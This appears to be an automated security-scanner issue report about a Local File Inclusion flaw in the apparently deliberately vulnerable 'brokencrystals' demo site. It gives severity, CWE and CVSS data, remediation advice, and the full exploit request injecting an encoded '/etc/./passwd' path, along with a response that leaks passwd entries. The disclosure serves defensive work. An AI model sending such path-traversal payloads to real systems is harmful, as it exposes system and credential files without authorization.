
Local File Inclusion #12

Description

@bright-security

Local File Inclusion

Severity: High Discovered: 10 October 2022, 11:12 PM

CWE ID

CWE-22

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details

Local File Inclusion (also known as LFI) is the process of including files that are already located on the server by exploiting vulnerable inclusion procedures implemented in the application.
LFI occurred while injecting token "/etc/./passwd" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/file?path=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg
Detected system is: Linux

Possible exposure

Data leakage, Access to unauthorized information

Remediation suggestions

The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible, the application can maintain a whitelist of files that may be included by the page and then use an identifier (for example, the index number) to access the selected file. Any request containing an invalid identifier has to be rejected; in this way there is no attack surface for malicious users to manipulate the path.

Request

GET https://brokencrystals.com/api/file?path=%2Fetc%2F.%2Fpasswd&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443548473; connect.sid=sHyC6Ic9qPYT5MQmsUZnv3nOZL1OQaY6.l7wv3qq%2BYzKke0kaiNh473SOFW%2BDgJOpYs9CB%2BmEywo
Accept-Encoding: identity

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:28 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443548511
Content-Length: 100
Cache-Control: public, max-age=99999

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/
